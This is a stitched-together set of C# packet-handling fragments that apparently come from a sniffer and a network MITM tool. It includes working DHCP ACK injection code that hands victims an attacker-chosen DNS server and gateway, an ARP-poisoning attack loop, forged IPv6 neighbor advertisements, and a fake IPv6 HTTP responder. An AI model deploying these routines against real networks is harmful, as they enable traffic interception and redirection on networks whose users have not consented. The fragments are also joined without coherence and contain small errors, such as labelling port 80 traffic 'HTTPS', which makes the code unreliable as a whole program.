temp = Packet.ParsePacket(pac.LinkLayerType, pac.Data);
rawp = pac;
DateTime time = pac.Timeval.Date;
this.time = time.Date.ToString().Split()[0] + " " + time.Hour.ToString() + ":" + time.Minute.ToString() + ":" + time.Second.ToString() + ":" + time.Millisecond.ToString();
this.destination = "";
this.color = "";
this.srcPort = "";
this.desPort = "";
this.source = "";
this.protocol = "";
this.information = "";
this.data = "";
this.layer = pac.LinkLayerType;
this.paclen = temp.Bytes.Length;
PacketInforArray.Add("Total Length : " + this.paclen.ToString() + "Bytes");
KeyWords.Add(this.paclen.ToString());
if (this.layer == PacketDotNet.LinkLayers.Ethernet)
{
//
//以太网层
//
epac = (PacketDotNet.EthernetPacket)temp;
EthernetInforArray.Add("Ethernet II \n");
// EthernetInforArray.Add("Destination Hardware Address: " + epac.DestinationHwAddress.ToString() + "\n");
EthernetInforArray.Add("Destination Hardware Address: " + genHardwareAddr(epac.DestinationHwAddress.ToString()) + "\n");
// EthernetInforArray.Add("Source Hardware Address: " + epac.SourceHwAddress.ToString() + "\n");
EthernetInforArray.Add("Source Hardware Address: " + genHardwareAddr(epac.SourceHwAddress.ToString()) + "\n");
EthernetInforArray.Add("Type of the ethernet: " + epac.Type.ToString() + "\n");
KeyWords.Add("Ethernet".ToUpper());
KeyWords.Add(genHardwareAddr(epac.DestinationHwAddress.ToString().ToUpper()));
KeyWords.Add(genHardwareAddr(epac.SourceHwAddress.ToString().ToUpper()));
KeyWords.Add(epac.Type.ToString().ToUpper());
Network_type = epac.Type.ToString().ToUpper();
//
//ip层
//
if (epac.Type.ToString() == "IpV4" || epac.Type.ToString() == "IpV6")
{
//ipv4
if (epac.Type.ToString() == "IpV4")
{
//record keywords
ip4 = (IPv4Packet)epac.Extract(typeof(IPv4Packet));
this.protocol = ip4.Protocol.ToString();
this.destination = ip4.DestinationAddress.ToString();
this.source = ip4.SourceAddress.ToString();
this.information = ip4.TotalLength.ToString() + "Bytes | id :" + ip4.Id.ToString() + " |";
//Internet protocl messages
IpInforArray.Add("HeaderLength : " + (ip4.HeaderLength * 4).ToString() + "Bytes \n");
IpInforArray.Add("Version: " + ip4.Version.ToString() + "\n");
IpInforArray.Add("Type of Service: " + ip4.TypeOfService.ToString() + "\n");
IpInforArray.Add("Total Length: " + ip4.Bytes.Length.ToString() + "Bytes \n");
IpInforArray.Add("Identification: 0x" + Convert.ToString((Int32)ip4.Id, 16).ToUpper().PadLeft(4, '0') + "(" + ip4.Id.ToString() + ")\n");
IpInforArray.Add("Flags: 0x" + Convert.ToString(ip4.Bytes[6] / 32, 16).ToUpper().PadLeft(2, '0') + "\n"); //
IpInforArray.Add("Fragment Offset: " + (Convert.ToInt32((ip4.Bytes[6] % 32) << 8) + Convert.ToInt32(ip4.Bytes[7])).ToString() + "\n");
IpInforArray.Add("TTL: " + ip4.TimeToLive.ToString() + "\n");
IpInforArray.Add("Protocol: " + ip4.Protocol.ToString() + " \n");
IpInforArray.Add("CheckSum: " + ip4.Checksum.ToString() + "\n");
IpInforArray.Add("Source IP Address: " + ip4.SourceAddress.ToString() + "\n");
IpInforArray.Add("Destination IP Address: " + ip4.DestinationAddress.ToString() + "\n");
IpInforArray.Add("Option: if any.\n");
KeyWords.Add(ip4.Protocol.ToString().ToUpper());
KeyWords.Add(ip4.Id.ToString().ToUpper());
KeyWords.Add(ip4.SourceAddress.ToString().ToUpper());
KeyWords.Add(ip4.DestinationAddress.ToString().ToUpper());
TRANS_type = ip4.Protocol.ToString().ToUpper();
if (ip4.Protocol.ToString() == "ICMP")
{
icmpProtocol();
}
else if (ip4.Protocol.ToString() == "UDP")
{
udpProtocol();
}
else if (ip4.Protocol.ToString() == "TCP")
{
tcpProtocol();
}
else if (ip4.Protocol.ToString() == "IGMP")
{
igmpProtocol();
}
else
{
;
}
}
else if (epac.Type.ToString() == "IpV6")
{
ip6 = (IPv6Packet)epac.Extract(typeof(IPv6Packet));
this.protocol = ip6.Protocol.ToString();
this.destination = ip6.DestinationAddress.ToString();
this.source = ip6.SourceAddress.ToString();
this.information = ip6.TotalLength.ToString() + "Bytes ";
IpInforArray.Add("Version: " + ip6.Version.ToString() + "\n");
IpInforArray.Add("Traffic Class : 0x" + Convert.ToString(ip6.Bytes[0] % 16, 16).PadLeft(1, '0') + Convert.ToString((Int32)(ip6.Bytes[1] / 16), 16).PadLeft(1, '0') + "\n");
IpInforArray.Add("Flow Label: 0x" + Convert.ToString(ip6.Bytes[1] % 16, 16).PadLeft(1, '0') + Convert.ToString(ip6.Bytes[2], 16).PadLeft(2, '0') + Convert.ToString(ip6.Bytes[3], 16).PadLeft(2, '0') + "\n");
IpInforArray.Add("Payload Length: " + ip6.PayloadLength.ToString() + "\n");
IpInforArray.Add("Next Header: " + ip6.NextHeader.ToString() + "\n");
IpInforArray.Add("Hop Limit: " + ip6.HopLimit.ToString() + "\n");
IpInforArray.Add("Source Address: " + ip6.SourceAddress.ToString() + "\n");
IpInforArray.Add("Destination Address: " + ip6.DestinationAddress.ToString() + "\n");
KeyWords.Add(ip6.Protocol.ToString().ToUpper());
KeyWords.Add(ip6.SourceAddress.ToString().ToUpper());
KeyWords.Add(ip6.DestinationAddress.ToString().ToUpper());
TRANS_type = ip6.Protocol.ToString().ToUpper();
// if(ip6.PayloadData != null && ip6.PayloadData[0] == 58)
// MessageBox.Show("ICMPv6");
if (ip6.Protocol.ToString() == "ICMPV6")
{
icmpProtocol();
}
else if (ip6.Protocol.ToString() == "UDP")
{
udpProtocol();
}
else if (ip6.Protocol.ToString() == "TCP")
{
tcpProtocol();
}
else if (ip6.Protocol.ToString() == "IGMP")
{
igmpProtocol();
}
else if (ip6.PayloadData != null && ip6.PayloadData[0] == 58)
{
icmpProtocol();;
}
KeyWords.Add(this.color.ToString().ToUpper());
KeyWords.Add(this.protocol.ToString().ToUpper());
}
}
else if (epac.Type.ToString() == "Arp") //分析arp报文
{
var arppacket = (ARPPacket)epac.Extract(typeof(ARPPacket));
ArpInforArray.Add("HardwareAddressType: " + arppacket.HardwareAddressType.ToString() + "\n");
ArpInforArray.Add("ProtocolAddressType: " + arppacket.ProtocolAddressType.ToString() + "\n");
ArpInforArray.Add("HardwareAddressLength: " + arppacket.HardwareAddressLength.ToString());
ArpInforArray.Add("ProtocolAddressLength: " + arppacket.ProtocolAddressLength.ToString());
ArpInforArray.Add("Operation: " + arppacket.Operation.ToString());
ArpInforArray.Add("SenderHardwareAddress: " + genHardwareAddr(arppacket.SenderHardwareAddress.ToString()));
ArpInforArray.Add("SenderProtocolAddress: " + arppacket.SenderProtocolAddress.ToString());
ArpInforArray.Add("TargetHardwareAddress: " + genHardwareAddr(arppacket.TargetHardwareAddress.ToString()));
ArpInforArray.Add("TargetProtocolAddress: " + arppacket.TargetProtocolAddress.ToString());
this.color = "Salmon";
this.protocol = "ARP";
this.source = arppacket.SenderProtocolAddress.ToString();
this.destination = arppacket.TargetProtocolAddress.ToString();
this.information = arppacket.SenderProtocolAddress.ToString() + " want to get in touch with " + arppacket.TargetProtocolAddress.ToString();
KeyWords.Add(genHardwareAddr(arppacket.SenderHardwareAddress.ToString().ToUpper()));
KeyWords.Add(arppacket.SenderProtocolAddress.ToString().ToUpper());
KeyWords.Add(genHardwareAddr(arppacket.TargetHardwareAddress.ToString().ToUpper()));
KeyWords.Add(arppacket.TargetProtocolAddress.ToString().ToUpper());
KeyWords.Add(this.color);
}
}
}
unsafe public void AnalyzePacket(WinPcapDevice device, Packet p)
{
if (p.PayloadPacket == null || p.PayloadPacket.PayloadPacket == null || !(p.PayloadPacket.PayloadPacket is UdpPacket))
return;
UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket;
if (udp.ParentPacket == null)
return;
if (!(udp.ParentPacket is IPv4Packet))
return;
IPv4Packet packetIpLayer = (IPv4Packet)udp.ParentPacket;
if (udp.PayloadData.Length < sizeof(DHCP.bootp))
return;
DHCP.bootp* dhcp = (DHCP.bootp*)Marshal.UnsafeAddrOfPinnedArrayElement(udp.PayloadData, 0).ToPointer();
DHCP.RequestedIP optionRequestedIP = new DHCP.RequestedIP();
bool existsOptionRequestedIP = false;
DHCP.ServerID optionServerID = new DHCP.ServerID();
bool existsOptionServerID = false;
string Strname = string.Empty;
ushort bp_vend_len = (ushort)(udp.Length - Marshal.SizeOf(*dhcp) + 4);
uint pos = 4;
while (pos < bp_vend_len)
{
byte option = dhcp->bp_vend[pos];
if (option == 0xff)
{
break;
}
byte len = dhcp->bp_vend[pos + 1];
switch (option)
{
case DHCP.TAG_DHCP_MESSAGE:
{
DHCP.MessageType* mtype = (DHCP.MessageType*)(dhcp->bp_vend + pos);
//We save the real DHCP IP
if (mtype->type == DHCP.DHCPACK && packetIpLayer.SourceAddress.Address != 0)
DHCPIP = packetIpLayer.SourceAddress;
//We get the DHCP Server MAC
if (mtype->type == DHCP.DHCPOFFER)
DHCPMAC = (p as EthernetPacket).SourceHwAddress;
//We only continue if it's a DHCP Request
if (mtype->type != DHCP.DHCPREQUEST)
return;
break;
}
case DHCP.TAG_REQUESTED_IP:
{
optionRequestedIP.id = ((DHCP.RequestedIP*)(dhcp->bp_vend + pos))->id;
existsOptionRequestedIP = true;
break;
}
case DHCP.TAG_SERVER_ID:
{
optionServerID.id = ((DHCP.ServerID*)(dhcp->bp_vend + pos))->id;
DHCPIP = new IPAddress(optionServerID.id);
existsOptionServerID = true;
break;
}
case DHCP.TAG_HOSTNAME:
{
byte* chr = (((DHCP.Hostname*)(dhcp->bp_vend + pos))->name);
byte lenght = ((DHCP.Hostname*)(dhcp->bp_vend + pos))->optionHeader.lenght;
for (int i = 0; i < lenght; i++)
Strname += (char)chr[i];
break;
}
}
pos += (uint)len + 2; //The option and the length field
}
bool realizarataque = false;
string dns = string.Empty;
string gateway = string.Empty;
string MAC;
foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.DHCPACKInjection && A.attackStatus == Data.AttackStatus.Attacking))
{
dns = (attack as DHCPACKInjectionAttack).dns;
gateway = (attack as DHCPACKInjectionAttack).gateway;
MAC = (attack as DHCPACKInjectionAttack).MAC;
//If filter does not apply not continue
if (!string.IsNullOrEmpty(MAC) && !(p.PayloadPacket as EthernetPacket).SourceHwAddress.Equals(PhysicalAddress.Parse(MAC)))
realizarataque = false;
else
{
realizarataque = true;
break;
}
}
if (!realizarataque)
return;
//Configuration used in the attack
PhysicalAddress MACUsed;
if (Program.CurrentProject.data.settings.UseRealDHCPData)
{
if (DHCPMAC != null)
MACUsed = DHCPMAC;
else //If the real dhcp server mac is not found we use the computer network device mac
MACUsed = device.Interface.MacAddress;
}
else
{
MACUsed = PhysicalAddress.Parse(Program.CurrentProject.data.settings.DHCPFakeServerMAC);
}
IPAddress IPUsed;
if (Program.CurrentProject.data.settings.UseRealDHCPData)
{
if (existsOptionServerID)
IPUsed = new IPAddress(optionServerID.id);
else
{
if (DHCPIP.Address == 0)
{
Program.LogThis("DHCP IP Address unknown, using 0.0.0.0 as IP source", Logs.Log.LogType.DHCPACKInjection);
IPUsed = IPAddress.Parse("0.0.0.0");
}
else
{
IPUsed = DHCPIP;
}
}
}
else
{
IPUsed = IPAddress.Parse(Program.CurrentProject.data.settings.DHCPFakeServerIP);
}
//Now we create a fake response
EthernetPacket response = new EthernetPacket(MACUsed, new PhysicalAddress(new byte[] { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }), EthernetPacketType.IpV4);
response.PayloadPacket = new IPv4Packet(IPUsed, new System.Net.IPAddress(0xffffffff));
//We want to follow the IP communication
(response.PayloadPacket as IPv4Packet).Id = packetIpLayer.Id;
response.PayloadPacket.PayloadPacket = new UdpPacket(67, 68);
response.PayloadPacket.PayloadPacket.PayloadData = new byte[16];
response.PayloadPacket.PayloadPacket.PayloadData = new byte[sizeof(DHCP.bootp) + sizeof(DHCP.optionsResponse)];
dhcp->bp_op = DHCP.BOOTPREPLY;
if (existsOptionRequestedIP)
dhcp->bp_yiaddr = optionRequestedIP.id;
else if (dhcp->bp_ciaddr != 0)
dhcp->bp_yiaddr = dhcp->bp_ciaddr;
else
{
return;
}
dhcp->bp_flags = 0;
Marshal.Copy(new IntPtr(dhcp), response.PayloadPacket.PayloadPacket.PayloadData, 0, sizeof(DHCP.bootp));
//We need to fill the optionResponseStatic fields
if (existsOptionServerID)
optionResponseStatic.serverID.id = optionServerID.id;
optionResponseStatic.serverID.id = (uint)IPUsed.Address;
optionResponseStatic.route.ip = (uint)IPAddress.Parse(gateway).Address;
optionResponseStatic.domainNameServer.ip = (uint)IPAddress.Parse(dns).Address;
fixed (DHCP.optionsResponse* op = &optionResponseStatic)
{
Marshal.Copy(new IntPtr(op), response.PayloadPacket.PayloadPacket.PayloadData, sizeof(DHCP.bootp), sizeof(DHCP.optionsResponse));
}
response.UpdateCalculatedValues();
(response.PayloadPacket as IPv4Packet).UpdateCalculatedValues();
(response.PayloadPacket as IPv4Packet).UpdateIPChecksum();
(response.PayloadPacket.PayloadPacket as UdpPacket).UpdateCalculatedValues();
(response.PayloadPacket.PayloadPacket as UdpPacket).UpdateUDPChecksum();
device.SendPacket(response);
string message = string.Format("DHCP ACK sent to a {0} DHCP Request", new IPAddress(dhcp->bp_yiaddr).ToString());
Program.LogThis(message, Logs.Log.LogType.DHCPACKInjection);
}
private string findProtocol(PacketDotNet.EthernetPacket packet)
{
if (packet != null)
{
//Console.WriteLine("-------------------------------");
//System.Diagnostics.Trace.WriteLine("{0}", packet.Type.ToString());
//Console.WriteLine("-------------------------------");
if (packet.Type.ToString().Equals("IpV4"))
{
//System.Diagnostics.Trace.WriteLine("{0}", packet.Type.ToString());
// Console.WriteLine("Som v IPv4");
var IpPacket = (PacketDotNet.IpPacket)packet.Extract(typeof(PacketDotNet.IpPacket));
//System.Diagnostics.Trace.WriteLine("{0}", IpPacket.Protocol.ToString());
if (IpPacket.Protocol.ToString().Equals("TCP"))
{
// System.Diagnostics.Trace.WriteLine("{0}", packet.Type.ToString());
// Console.WriteLine("Som v TCP");
var TcpPacket = (PacketDotNet.TcpPacket)IpPacket.Extract(typeof(PacketDotNet.TcpPacket));
if (TcpPacket.SourcePort == 80)
{
return("HTTPS");
}
else if (TcpPacket.DestinationPort == 80)
{
return("HTTPD");
}
return("TCP");
}
else if (IpPacket.Protocol.ToString().Equals("UDP"))
{
// Console.WriteLine("Som v UDP");
return("UDP");
}
else if (IpPacket.Protocol.ToString().Equals("ICMP"))
{
var icmpPacket = (PacketDotNet.ICMPv4Packet)IpPacket.Extract(typeof(PacketDotNet.ICMPv4Packet));
if (icmpPacket.TypeCode.ToString().Equals("EchoReply"))
{
return("ICMPRep");
}
else if (icmpPacket.TypeCode.ToString().Equals("EchoRequest"))
{
return("ICMPReq");
}
}
}
else if (packet.Type.ToString().Equals("Arp"))
{
//System.Diagnostics.Trace.WriteLine("{0}", packet.Type.ToString());
// Console.WriteLine("Som v ARP");
return("ARP");
}
else
{
// System.Diagnostics.Trace.WriteLine("{0}", packet.Type.ToString());
return(null);
}
}
return(null);
}
// create ARP request packet (destination IP, deviceInfo)
private EthernetPacket GenerateARPRequest(IPAddress destinationIP, IPAddress senderIP)
{
var ethernetPacket = new EthernetPacket(physicalAddress, broadcastMAC, EthernetPacketType.Arp);
var arpPacket = new ARPPacket(ARPOperation.Request, broadcastMAC, destinationIP, physicalAddress, senderIP);
ethernetPacket.PayloadPacket = arpPacket;
return ethernetPacket;
}
static public void SendNeighborAdvertisement(IPAddress ipSrc, PhysicalAddress MACSrc, IPAddress ipDest, PhysicalAddress MACDest)
{
Packet p = new EthernetPacket(MACSrc, MACDest, EthernetPacketType.IpV6);
p.PayloadPacket = new IPv6Packet(ipSrc, ipDest);
(p.PayloadPacket as IPv6Packet).HopLimit = 255;
NeighborAdvertisement NA = new NeighborAdvertisement(ipSrc, MACSrc);
ICMPv6Packet icmp = new ICMPv6Packet(new ByteArraySegment(NA.GetBytes()));
icmp.Type = (ICMPv6Types)136; //Neighbor Advertisement
icmp.Code = 0;
p.PayloadPacket.PayloadPacket = icmp;
Program.CurrentProject.data.SendPacket(p);
}
public void ParsingPacket()
{
var dev = new CaptureFileReaderDevice("../../CaptureFiles/test_stream.pcap");
dev.Open();
RawCapture p;
p = dev.GetNextPacket();
var e = new EthernetPacket(new ByteArraySegment(p.Data));
Console.WriteLine("ethernet.ToString() {0}", e.ToString());
Assert.AreEqual(PhysicalAddress.Parse("00-13-10-03-71-47"), e.SourceHwAddress);
Assert.AreEqual(PhysicalAddress.Parse("00-E0-4C-E5-73-AD"), e.DestinationHwAddress);
Assert.AreEqual(EthernetPacketType.IpV4, e.Type);
dev.Close();
}
private void Ipv6ToIpv4(EthernetPacket orgPacket)
{
try
{
IPv6Packet ipv6 = (IPv6Packet)orgPacket.PayloadPacket;
if (ipv6.PayloadPacket is PacketDotNet.ICMPv6Packet)
{
ICMPv6Packet icmp = ipv6.PayloadPacket as ICMPv6Packet;
icmp.Type = ICMPv6Types.EchoReply;
icmp.UpdateCalculatedValues();
icmp.Checksum = (ushort)ChecksumUtils.OnesComplementSum(icmp.Bytes);
IPv6Packet ipv6Ack = new IPv6Packet(ipv6.DestinationAddress, ipv6.SourceAddress);
ipv6Ack.PayloadPacket = icmp;
EthernetPacket eth = new EthernetPacket(orgPacket.DestinationHwAddress, orgPacket.SourceHwAddress, EthernetPacketType.IpV6);
eth.PayloadPacket = ipv6Ack;
Program.CurrentProject.data.SendPacket(eth);
}
else if (ipv6.PayloadPacket is PacketDotNet.TcpPacket)
{
TcpPacket tcp = ipv6.PayloadPacket as TcpPacket;
ushort destPort = tcp.SourcePort;
ushort sourcePort = tcp.DestinationPort;
IPAddress destAddress = ipv6.SourceAddress;
IPAddress sourceAddress = ipv6.DestinationAddress;
PhysicalAddress sourceMac = device.MacAddress;
PhysicalAddress destMac = orgPacket.SourceHwAddress;
tcp.SourcePort = sourcePort;
tcp.DestinationPort = destPort;
if (tcp.Syn && !tcp.Ack && !tcp.Rst && tcp.PayloadData.Length == 0)
{
if (sourcePort == 80)
{
tcp.Ack = true;
tcp.AcknowledgmentNumber = tcp.SequenceNumber + 1;
tcp.SequenceNumber = tcp.SequenceNumber + 38;
tcp.WindowSize = 14600;
IPv6Packet ipv6Ack = new IPv6Packet(sourceAddress, destAddress);
ipv6Ack.PayloadPacket = tcp;
EthernetPacket eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6);
eth.PayloadPacket = ipv6Ack;
(eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum();
Program.CurrentProject.data.SendPacket(eth);
}
else if (sourcePort == 443)
{
tcp.Syn = false;
tcp.Ack = true;
tcp.Rst = true;
tcp.Psh = false;
uint ackOrg = tcp.AcknowledgmentNumber;
tcp.AcknowledgmentNumber = tcp.SequenceNumber + 1;
tcp.SequenceNumber = 0;
tcp.WindowSize = 0;
tcp.PayloadData = new byte[0];
IPv6Packet ipv6Ack = new IPv6Packet(sourceAddress, destAddress);
ipv6Ack.PayloadPacket = tcp;
EthernetPacket eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6);
eth.PayloadPacket = ipv6Ack;
(eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum();
Program.CurrentProject.data.SendPacket(eth);
}
}
else if (!tcp.Syn && tcp.Ack && tcp.PayloadData != null && !tcp.Rst && tcp.PayloadData.Length > 0 && sourcePort == 80)
{
string element = string.Format("{0}/{1}", tcp.SequenceNumber, tcp.AcknowledgmentNumber);
if (!Data.Data.SlaacReqList.Contains(element))
{
Data.Data.SlaacReqList.Add(element);
HttpPacket httpReq = new HttpPacket(tcp.PayloadData);
if (httpReq.IsCompleted)
{
SendHttpResponse(httpReq, orgPacket, tcp.SourcePort, tcp.DestinationPort, tcp.AcknowledgmentNumber, tcp.SequenceNumber + (uint)tcp.PayloadData.Length);
}
else
{
lock (htppLock)
{
//incomplete packet
TcpReconstructorPacket previousPacket = (from p in Program.CurrentProject.data.ReconstructedPackets
where p.ExpectedSequenceNumber == tcp.SequenceNumber
select p).FirstOrDefault();
TcpReconstructorPacket nextPacket = (from p in Program.CurrentProject.data.ReconstructedPackets
where p.FirstSequenceNumber == tcp.SequenceNumber + tcp.PayloadData.Length
select p).FirstOrDefault();
if (nextPacket != null || previousPacket != null)
{
bool packetSend = false;
if (nextPacket != null)
{
nextPacket.InsertPreviousTcpPacket(tcp);
httpReq = new HttpPacket(nextPacket.Data);
if (httpReq.IsCompleted)
{
packetSend = true;
Program.CurrentProject.data.ReconstructedPackets.Remove(nextPacket);
SendHttpResponse(httpReq, orgPacket, tcp.SourcePort, tcp.DestinationPort, tcp.AcknowledgmentNumber, nextPacket.ExpectedSequenceNumber);
}
}
if (previousPacket != null && !packetSend)
{
if (nextPacket != null)
{
previousPacket.AppendTcpPacket(nextPacket);
Program.CurrentProject.data.ReconstructedPackets.Remove(nextPacket);
}
else
previousPacket.AppendTcpPacket(tcp);
httpReq = new HttpPacket(previousPacket.Data);
if (httpReq.IsCompleted)
{
Program.CurrentProject.data.ReconstructedPackets.Remove(previousPacket);
SendHttpResponse(httpReq, orgPacket, tcp.SourcePort, tcp.DestinationPort, tcp.AcknowledgmentNumber, previousPacket.ExpectedSequenceNumber);
}
}
}
else
{
Program.CurrentProject.data.ReconstructedPackets.Add(new TcpReconstructorPacket(tcp));
}
var toDelete = Program.CurrentProject.data.ReconstructedPackets.Where(p => DateTime.Now.Subtract(p.CreationTime).TotalMinutes > 2);
foreach (var item in toDelete)
{
Program.CurrentProject.data.ReconstructedPackets.Remove(item);
}
}
}
}
}
else if (tcp.Fin && tcp.Ack && !tcp.Rst && tcp.PayloadData.Length == 0)
{
tcp.Ack = true;
tcp.Fin = false;
uint ackOrg = tcp.AcknowledgmentNumber;
tcp.AcknowledgmentNumber = tcp.SequenceNumber + 1;
tcp.SequenceNumber = ackOrg;
tcp.WindowSize = 1400;
IPv6Packet ipv6Ack = new IPv6Packet(sourceAddress, destAddress);
ipv6Ack.PayloadPacket = tcp;
EthernetPacket eth = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IpV6);
eth.PayloadPacket = ipv6Ack;
(eth.PayloadPacket.PayloadPacket as TcpPacket).UpdateTCPChecksum();
Program.CurrentProject.data.SendPacket(eth);
}
}
}
catch
{
}
}
private void Attack()
{
while (true)
{
try
{
PhysicalAddress MACLocal = device.MacAddress;
EthernetPacket ethernet;
foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.ARPSpoofing && A.attackStatus == Data.AttackStatus.Attacking))
{
if (attack is MitmAttack)
{
ethernet = GenerateResponseArpPoison(device.Interface.MacAddress,
((MitmAttack)attack).t1.mac,
((MitmAttack)attack).t1.ip,
((MitmAttack)attack).t2.ip);
Program.CurrentProject.data.SendPacket(ethernet);
ethernet = GenerateResponseArpPoison(device.Interface.MacAddress,
((MitmAttack)attack).t2.mac,
((MitmAttack)attack).t2.ip,
((MitmAttack)attack).t1.ip);
Program.CurrentProject.data.SendPacket(ethernet);
}
}
foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.ARPSpoofing && A.attackStatus == Data.AttackStatus.Stopping))
{
if (attack is MitmAttack)
{
ethernet = new EthernetPacket(device.Interface.MacAddress, ((MitmAttack)attack).t1.mac, EthernetPacketType.Arp);
ethernet.PayloadPacket = new ARPPacket(ARPOperation.Response, ((MitmAttack)attack).t1.mac, ((MitmAttack)attack).t1.ip, ((MitmAttack)attack).t2.mac, ((MitmAttack)attack).t2.ip);
Program.CurrentProject.data.SendPacket(ethernet);
ethernet = new EthernetPacket(device.Interface.MacAddress, ((MitmAttack)attack).t2.mac, EthernetPacketType.Arp);
ethernet.PayloadPacket = new ARPPacket(ARPOperation.Response, ((MitmAttack)attack).t2.mac, ((MitmAttack)attack).t2.ip, ((MitmAttack)attack).t1.mac, ((MitmAttack)attack).t1.ip);
Program.CurrentProject.data.SendPacket(ethernet);
attack.attackStatus = Data.AttackStatus.Stop;
}
}
Thread.Sleep(SendPacketEachXSecs * 1000);
}
catch (ThreadAbortException)
{
return;
}
catch
{
}
}
}
public LinuxSLLPacket(byte[] Bytes, int Offset, PosixTimeval Timeval) : base(Timeval)
{
base.header = new ByteArraySegment(Bytes, Offset, LinuxSLLFields.SLLHeaderLength);
base.payloadPacketOrData = EthernetPacket.ParseEncapsulatedBytes(base.header, this.EthernetProtocolType, Timeval);
}
